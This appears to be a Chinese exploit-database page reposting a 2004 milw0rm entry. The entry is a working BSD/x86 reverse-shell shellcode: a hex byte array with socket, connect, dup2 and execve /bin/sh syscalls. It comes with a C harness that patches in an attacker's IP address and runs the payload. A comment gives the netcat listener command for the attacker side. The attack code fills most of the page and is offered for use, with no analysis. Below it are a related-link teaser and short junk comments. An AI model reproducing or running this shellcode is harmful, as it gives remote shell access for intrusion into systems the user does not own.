BSD/x86 – Reverse (192.168.2.33:6969/TCP) Shell Shellcode (129 bytes)
漏洞ID | 1054681 | 漏洞类型 | |
发布时间 | 2004-09-26 | 更新时间 | 2004-09-26 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | BSD | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/* reverse-portshell *BSD shellcode by noir */
/* local usage: ./reverse-shell 192.168.2.33 */
/* remote: nc -n -v -v -l -p 6969 */
/* listen on 6969/tcp */
/* [email protected] */
char shellcode[] =
{
0x31,0xc9,0x51,0x41,
0x51,0x41,0x51,0x51,
0x31,0xc0,0xb0,0x61,
0xcd,0x80,0x89,0x07,
0x31,0xc9,0x88,0x4f,
0x04,0xc6,0x47,0x05,
0x02,0xc7,0x47,0x08,
0xc0,0xa8,0x01,0x45, //ipaddr
0x66,0xc7,0x47,0x06,
0x1b,0x39,0x6a,0x10,
0x8d,0x47,0x04,0x50,
0x8b,0x07,0x50,0x50,
0x31,0xc0,0xb0,0x62,
0xcd,0x80,0x31,0xc9,
0x51,0x8b,0x07,0x50,
0x50,0x31,0xc0,0xb0,
0x5a,0xcd,0x80,0x41,
0x83,0xf9,0x03,0x75,
0xef,0x31,0xc9,0x51,
0x51,0x31,0xc0,0xb0,
0x17,0xcd,0x80,0xeb,
0x23,0x5b,0x89,0x1f,
0x31,0xc9,0x88,0x4b,
0x07,0x89,0x4f,0x04,
0x51,0x8d,0x07,0x50,
0x8b,0x07,0x50,0x50,
0x31,0xc0,0xb0,0x3b,
0xcd,0x80,0x31,0xc9,
0x51,0x51,0x31,0xc0,
0xb0,0x01,0xcd,0x80,
0xe8,0xd8,0xff,0xff,
0xff,0x2f,0x62,0x69,
0x6e,0x2f,0x73,0x68,
0x41
};
int
main(int argc, char ** argv)
{
void (*f) (void);
unsigned int d;
if(!argv[0])
exit(0);
d = inet_addr(argv[1]);
printf("IP: %lx shellcode len: %dn", d, strlen(shellcode));
shellcode[28] = d & 0xff ;
shellcode[29] = (d >> 8) & 0xff;
shellcode[30] = (d >> 16) & 0xff;
shellcode[31] = (d >> 24) & 0xff;
f = (void *) shellcode;
f();
}
// milw0rm.com [2004-09-26]
相关推荐: CGI Script Center Subscribe Me Lite Account Deletion Vulnerability
CGI Script Center Subscribe Me Lite Account Deletion Vulnerability 漏洞ID 1103702 漏洞类型 Access Validation Error 发布时间 2000-11-02 更新时间 …
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666